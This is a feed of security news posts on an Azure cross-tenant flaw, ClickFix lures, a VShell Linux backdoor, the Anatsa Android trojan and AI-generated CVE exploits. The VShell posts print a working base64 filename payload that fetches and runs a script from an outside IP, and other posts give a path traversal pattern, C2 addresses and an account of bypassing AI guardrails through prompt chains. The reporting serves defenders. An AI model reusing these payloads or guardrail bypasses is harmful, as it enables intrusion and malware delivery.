• A critical vulnerability in Microsoft Azure’s API Connection infrastructure enabled attackers to compromise resources across different Azure tenants worldwide. 

    The flaw, which earned Gulbrandsrud a $40,000 bounty and a Black Hat presentation slot, exploited Azure’s shared API Management (APIM) instance architecture to gain unauthorized access to Key Vaults, Azure SQL databases, and third-party services like Jira and Salesforce across tenant boundaries.

    The vulnerability centered on Azure’s globally shared APIM instance, where all API Connections are deployed, creating an attack surface that transcended tenant isolation. 

    Key Takeaways
    1. Azure's DynamicInvoke endpoint allowed attackers to access other tenants' API Connections.
    2. Exploited connections could compromise Key Vaults, databases, and third-party services across Azure tenants.
    3. Microsoft patched quickly and paid $40,000 for breaking Azure's tenant isolation model.

    By manipulating the undocumented DynamicInvoke endpoint, attackers could traverse connection boundaries and access any API Connection deployed on the shared infrastructure with full backend privileges.

    Azure’s Default API Connection Vulnerability

    The core of the vulnerability lay in Azure Resource Manager’s (ARM) handling of the DynamicInvoke endpoint, which processes API Connection requests with super-privileged tokens. 

    When ARM receives a DynamicInvoke request, it constructs URLs using the pattern /apim/[ConnectorType]/[ConnectionId]/[Action-Endpoint] with elevated authentication tokens.

    Gulbrandsrud discovered that by creating a custom Logic App connector with a vulnerable path parameter, attackers could inject path traversal sequences. 

    The researcher demonstrated this by defining a simple endpoint with a {path} parameter, then supplying malicious input like ../../../../[VictimConnectorType]/[VictimConnectionID]/[action]. 

    When ARM processed this request, URL normalization resulted in direct access to victim connections.

    The attack was demonstrated against an Azure Key Vault connection:

    Azure's Default API Connection Vulnerability

    Mitigation

    Microsoft confirmed the vulnerability within three days of the April 7, 2025, disclosure and implemented mitigations within a week. 

    The initial fix involved implementing a blacklist on path parameters to block ../ sequences and URL-encoded variants. 

    However, Gulbrandsrud noted this solution may be insufficient, suggesting potential bypasses through alternative path normalization techniques or direct API Connection path manipulation.

    The vulnerability required Contributor-level privileges to the attacking tenant’s API Connection, limiting the attack surface to privileged users. 

    However, the global scope and cross-tenant implications made this a critical security issue affecting Azure’s fundamental tenant isolation model. 

    Microsoft’s substantial bounty award reflects the severity of compromising the shared infrastructure that supports Azure’s multi-tenant architecture.

    Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial → 

    The post Azure’s Default API Connection Vulnerability Enables Full Cross-Tenant Compromise appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Belarusian-affiliated threat actor UAC-0057, also known as UNC1151, FrostyNeighbor, or Ghostwriter, has been using weaponized archives that contain phony PDFs that are posing as official invitations and documents to target organizations in Poland and Ukraine in a sophisticated cyber espionage campaign. Since April 2025, these operations have utilized compressed archives, such as RAR and […]

    The post Malicious PDFs in Play: UAC-0057 Leveraging Invitations to Trigger Shell Script Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers have identified a sophisticated social engineering technique called ClickFix that has been rapidly gaining traction among threat actors since early 2024.

    This deceptive attack method targets both Windows and macOS devices, tricking users into executing malicious commands through seemingly legitimate technical troubleshooting procedures.

    The technique has been observed in campaigns affecting thousands of enterprise and consumer devices globally on a daily basis, representing a significant evolution in social engineering tactics.

    The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues.

    The typical ClickFix attack chain (Source – Microsoft)

    These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.

    The attack’s effectiveness lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.

    Microsoft analysts identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.

    These payloads typically operate as “fileless” malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.

    The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord.

    When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the navigator.clipboard.writeText() function.

    Technical Implementation and Command Execution

    The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut.

    Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.

    The malicious commands typically involve PowerShell cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) to download and execute payloads from remote servers.

    Lampion infection chain (Source – Microsoft)

    A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors.

    The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. Upon opening, these archives contained HTML files that redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.

    The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.

    The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS).

    These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.

    The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through xattr -c commands.

    Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which maintains a history of Run dialog executions.

    Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.

    Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash The […]

    The post Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Linux environments, long considered bastions of security, are facing a sophisticated new threat that challenges traditional assumptions about operating system safety.

    A recently discovered malware campaign exploits an ingenious attack vector that weaponizes RAR archive filenames to deliver the VShell backdoor, demonstrating how attackers are evolving beyond conventional exploitation techniques to target scripting patterns and file metadata.

    The attack begins with a seemingly innocuous spam email disguised as a beauty product survey invitation, offering a small monetary reward to entice victims.

    Unlike traditional phishing campaigns that focus on credential theft or brand impersonation, this social engineering approach exploits user curiosity while delivering a malicious RAR archive attachment.

    The archive contains a file with a specially crafted filename that serves as a dormant payload, waiting to execute when processed by common shell operations.

    What makes this attack particularly insidious is its exploitation of dangerous patterns prevalent in Linux shell scripts.

    Trellix researchers identified that the malicious filename contains embedded Bash-compatible code designed to execute commands when interpreted by the shell during routine operations such as directory enumeration or file listing.

    The filename itself acts as a payload trigger, bypassing traditional security defenses that typically focus on file content rather than metadata.

    The weaponized filename follows a complex structure that leverages shell command injection principles.

    When extracted, the archive reveals a file named ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash, which cannot be manually created through normal shell input due to its special characters being interpreted as command syntax.

    This filename was likely crafted using external tools or programming languages to bypass shell input validation.

    Infection Mechanism and Execution Chain

    The infection triggers when shell scripts process the malicious filename through common operations like for f in *; do eval "echo $f"; done.

    Malware infection flow (Source – Trellix)

    Multiple trigger vectors exist, including file listing operations with eval functions, find commands with eval parameters, and xargs processing with shell expansion.

    The embedded payload utilizes a multi-stage approach where the filename evaluates to a Base64-decoded command piped directly to bash.

    Once triggered, the initial stage downloads a second-stage script that detects system architecture and fetches the appropriate ELF binary for x86, x64, ARM, or ARM64 systems.

    The final payload, VShell, operates entirely in memory using fexecve() to avoid disk-based detection while masquerading as legitimate kernel threads like [kworker/0:2].

    This sophisticated evasion technique demonstrates the evolution of Linux-targeted malware toward more stealthy, memory-resident operations that challenge traditional security paradigms.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New Linux Malware With Weaponized RAR Archive Deploys VShell Backdoor appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Anatsa banking trojan, also known as TeaBot, continues to evolve as one of the most sophisticated Android malware threats targeting financial institutions worldwide.

    First discovered in 2020, this malicious software has demonstrated remarkable persistence in infiltrating Android devices through the official Google Play Store, where it masquerades as legitimate document reading applications to steal user credentials and monitor keystrokes.

    The malware employs a sophisticated dropper technique, distributing seemingly benign applications through Google’s official marketplace that appear as standard file managers or document readers.

    Example of an Anatsa decoy application in the Google Play Store (Source – Zscaler)

    Once installed, these decoy applications silently download malicious payloads disguised as routine software updates from command-and-control servers, effectively bypassing Google Play Store security mechanisms.

    The latest campaigns have significantly expanded Anatsa’s reach to target over 831 financial institutions across multiple continents, including newly added regions such as Germany and South Korea, alongside numerous cryptocurrency platforms.

    Zscaler analysts identified that many of these malicious decoy applications have individually exceeded 50,000 downloads, contributing to a broader ecosystem where 77 malicious applications from various malware families have collectively achieved over 19 million installations.

    The researchers noted that Anatsa has streamlined its payload delivery mechanism by replacing dynamic code loading of remote Dalvik Executable files with direct installation of the core malicious payload.

    Advanced Evasion and Persistence Mechanisms

    The current Anatsa variant implements sophisticated anti-analysis techniques that significantly enhance its detection evasion capabilities.

    Example behavior of the Anatsa installer depending on the result of anti-analysis checks (Source – Zscaler)

    The malware now employs Data Encryption Standard runtime decryption, dynamically generating DES keys to decrypt each string during execution, making static analysis considerably more challenging for security researchers.

    The malware utilizes corrupted ZIP archives with invalid compression and encryption flags to conceal DEX files, which are deployed during runtime. This technique exploits weaknesses in standard ZIP header validation used by analysis tools while maintaining compatibility with Android devices.

    Once successfully installed, Anatsa requests accessibility permissions and automatically enables critical system privileges including SYSTEM_ALERT_WINDOW, READ_SMS, and USE_FULL_SCREEN_INTENT.

    Communication with command-and-control servers occurs through encrypted channels using a single-byte XOR encryption key (decimal value 66), with the malware maintaining connections to multiple C2 domains including 185.215.113.108:85 and 193.24.123.18:85 for redundancy and persistence.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Anatsa Malware Attacking Android Devices to Steal Login Credentials and Monitor Keystrokes appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical security vulnerability in Microsoft Azure’s API Connection architecture has been discovered that could allow attackers to completely compromise resources across different tenant environments, potentially exposing sensitive data stored in Key Vaults, Azure SQL databases, and third-party services like Jira and Salesforce. The vulnerability, which earned a security researcher a $40,000 bounty from Microsoft and a […]

    The post Azure Default API Connection Flaw Enables Full Cross-Tenant Compromise appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Industrial technology company Colt has confirmed that a recent ransomware attack on its business support systems resulted in the theft of customer data, marking the latest in a series of high-profile cybersecurity incidents affecting critical infrastructure providers. The company disclosed that threat actors successfully accessed files containing customer-related information, prompting immediate containment measures and ongoing […]

    The post Colt Confirms Ransomware Attack Resulted in Customer Data Theft appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The National Institute of Standards and Technology (NIST) has unveiled a comprehensive initiative to address the growing cybersecurity challenges associated with artificial intelligence systems through the release of a new concept paper and proposed action plan for developing NIST SP 800-53 Control Overlays specifically designed for securing AI systems. New Framework Addresses Critical AI Security […]

    The post NIST Releases New Control Overlays to Manage Cybersecurity Risks in AI Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Artificial intelligence systems can automatically generate functional exploits for newly published Common Vulnerabilities and Exposures (CVEs) in just 10-15 minutes at approximately $1 per exploit. 

    This breakthrough significantly compresses the traditional “grace period” that defenders typically rely on to patch vulnerabilities before working exploits become available.

    The research, conducted by security experts Efi Weiss and Nahman Khayet, reveals that their AI system can process the daily stream of 130+ newly published CVEs far faster than human researchers. 

    Key Takeaways
    1. AI generates working CVE exploits in 10-15 minutes for $1 each.
    2. Automated three-stage system analyzes CVEs, creates exploits, and validates results.
    3. Defenders must now respond in minutes instead of weeks.

    The implications are profound for cybersecurity defenders who historically enjoyed hours, days, or even weeks before public exploits emerged for known vulnerabilities.

    AI-Powered Exploit Generation

    The researchers developed a sophisticated three-stage pipeline that combines Large Language Models (LLMs) with automated testing environments. 

    The system begins by analyzing CVE advisories and GitHub Security Advisory (GHSA) data, extracting crucial information including affected repositories, vulnerable versions, and patch details.

    The first stage involves technical analysis where the AI examines the vulnerability advisory and corresponding code patches. 

    For example, when processing CVE-2025-54887, a cryptographic bypass affecting JWT encryption, the system identified the specific attack vector and created a comprehensive exploitation plan.

    Iterative vulnerability exploitation cycle

    Iterative vulnerability exploitation cycle

    The second stage implements a test-driven approach using separate AI agents for creating vulnerable applications and exploit code. 

    The researchers discovered that using specialized agents prevented confusion between different tasks. 

    They employed Dagger containers to create secure sandboxes for testing, enabling the system to validate exploits against both vulnerable and patched versions to eliminate false positives.

    The validation loop proved critical, as initial attempts often produced “false positive” exploits that worked against both vulnerable and secure implementations. 

    The system iteratively refines both the vulnerable test application and exploit code until achieving genuine exploitation.

    Exploit

    Exploit

    The research produced working exploits for various vulnerability types across different programming languages. 

    Notable examples include GHSA-w2cq-g8g3-gm83, a JavaScript prototype pollution vulnerability, and GHSA-9gvj-pp9x-gcfr, a Python pickle sanitization bypass.

    The team utilized Claude Sonnet 4.0 as their primary model after finding that Software-as-a-Service (SaaS) models’ initial guardrails could be bypassed through carefully structured prompt chains. 

    They implemented caching mechanisms and type-safe interfaces using pydantic-ai to optimize performance and reliability.

    All generated exploits are timestamped using OpenTimestamps blockchain verification and made publicly available. 

    The researchers emphasize that traditional “7-day critical vulnerability fix” policies may become obsolete as AI capabilities advance, forcing defenders to dramatically accelerate their response times from weeks to minutes.

    This development represents a significant shift in the cybersecurity landscape, where the automation of exploit development could fundamentally alter the balance between attackers and defenders in the ongoing cybersecurity arms race.

    Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial → 

    The post AI Systems Can Generate Working Exploits for Published CVEs in 10-15 Minutes appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶